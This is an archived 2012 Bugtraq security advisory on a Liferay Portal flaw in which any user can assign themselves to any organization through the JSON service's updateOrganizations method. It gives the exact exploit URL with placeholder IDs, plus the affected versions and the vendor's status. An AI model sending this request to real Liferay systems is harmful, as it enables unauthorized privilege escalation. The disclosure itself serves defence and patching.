| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 13 May 2012 11:55:38 +0200 From: Jelmer Kuperus <jelmer.advisories@...il.com> To: BUGTRAQ@...urityfocus.com Subject: Liferay users can assign themselves to organizations, leading to possible privilege escalation Liferay users can assign themselves to organizations, leading to possible privilege escalation Description: Liferay Portal is an enterprise portal written in Java Due to insufficient permission checking in the updateOrganizations method of UserService any user can assign hem or her self to any organization by issueing a single http request http://vulnerabilehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updateOrganizations&serviceParameters=%5B%27userId%27%2C+%27organizationIds%27%5D&userId=YOUR_USER_ID&organizationIds=TARGET_ORGANIZATION_ID It is common to grant special privileges to members of an organization. Systems affected: Liferay 6.1 ce Liferay 6.1 ee liferay 6.0.x Vendor status : Liferay was notified april 22 2012 by filing a bug in their public bugtracker under issue number LPS-26887. The issue has since been flagged as private and has been resolved.
Powered by blists - more mailing lists